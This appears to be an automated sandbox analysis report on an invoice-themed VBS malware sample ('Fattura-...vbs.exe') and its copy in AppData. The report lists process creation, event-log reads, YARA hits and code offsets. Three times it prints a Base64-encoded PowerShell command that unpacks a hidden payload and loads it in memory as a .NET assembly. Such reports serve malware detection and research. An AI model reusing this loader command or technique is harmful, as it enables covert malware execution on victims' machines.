Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior

Spam, unwanted Advertisements and Ransom Demands
barindex
Reads the Security eventlog
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Reads the System eventlog
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A035480 NtProtectVirtualMemory, 7_2_0A035480
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A036D08 NtResumeThread, 7_2_0A036D08
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A035478 NtProtectVirtualMemory, 7_2_0A035478
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A036D00 NtResumeThread, 7_2_0A036D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE6D08 NtResumeThread, 15_2_09CE6D08
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE5480 NtProtectVirtualMemory, 15_2_09CE5480
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE6D00 NtResumeThread, 15_2_09CE6D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE5478 NtProtectVirtualMemory, 15_2_09CE5478
Detected potential crypto function
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_02F9AA89 7_2_02F9AA89
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_02F9EA60 7_2_02F9EA60
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_02F9AA89 7_2_02F9AA89
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_02F9EDE8 7_2_02F9EDE8
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03F8B8 7_2_0A03F8B8
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A031D70 7_2_0A031D70
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03F8AA 7_2_0A03F8AA
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A032CA0 7_2_0A032CA0
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A0E0006 7_2_0A0E0006
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A0E0040 7_2_0A0E0040
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A35E288 7_2_0A35E288
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A340006 7_2_0A340006
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A340040 7_2_0A340040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51C00 9_2_00A51C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A53416 9_2_00A53416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A54870 9_2_00A54870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A551C0 9_2_00A551C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A551D0 9_2_00A551D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51978 9_2_00A51978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A5426C 9_2_00A5426C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51FA9 9_2_00A51FA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51F94 9_2_00A51F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51FCA 9_2_00A51FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A51C00 9_2_00A51C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_02342B68 9_2_02342B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_02342B47 9_2_02342B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023D9010 9_2_023D9010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023D098D 9_2_023D098D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DD768 9_2_023DD768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023D9000 9_2_023D9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DD96D 9_2_023DD96D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DCF60 9_2_023DCF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DD758 9_2_023DD758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DCF50 9_2_023DCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023D2FF2 9_2_023D2FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0497B820 9_2_0497B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04975B18 9_2_04975B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0497A7BF 9_2_0497A7BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0497D8D0 9_2_0497D8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0497D8C1 9_2_0497D8C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0497B80F 9_2_0497B80F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C37C5F 9_2_04C37C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3D197 9_2_04C3D197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C38D08 9_2_04C38D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C37F97 9_2_04C37F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F274E0 9_2_04F274E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2E1F2 9_2_04F2E1F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F29D28 9_2_04F29D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2D880 9_2_04F2D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2A940 9_2_04F2A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2FA00 9_2_04F2FA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F274D0 9_2_04F274D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2348B 9_2_04F2348B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F275F7 9_2_04F275F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F27554 9_2_04F27554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2451C 9_2_04F2451C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F26668 9_2_04F26668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F26658 9_2_04F26658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2778F 9_2_04F2778F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2A070 9_2_04F2A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F23F6E 9_2_04F23F6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2D87F 9_2_04F2D87F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F27833 9_2_04F27833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F24817 9_2_04F24817
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2F9F1 9_2_04F2F9F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F23A60 9_2_04F23A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0552C0C8 9_2_0552C0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_05691367 9_2_05691367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_05691378 9_2_05691378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_05697DE8 9_2_05697DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_05697DD7 9_2_05697DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B8A8 9_2_0668B8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_066811D0 9_2_066811D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06684EEB 9_2_06684EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668468E 9_2_0668468E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668AF20 9_2_0668AF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B47B 9_2_0668B47B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B474 9_2_0668B474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B45B 9_2_0668B45B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668AC30 9_2_0668AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B260 9_2_0668B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668B270 9_2_0668B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_066892D9 9_2_066892D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0668937C 9_2_0668937C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_06689372 9_2_06689372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_066893AA 9_2_066893AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0675D6F0 9_2_0675D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_0675EF08 9_2_0675EF08
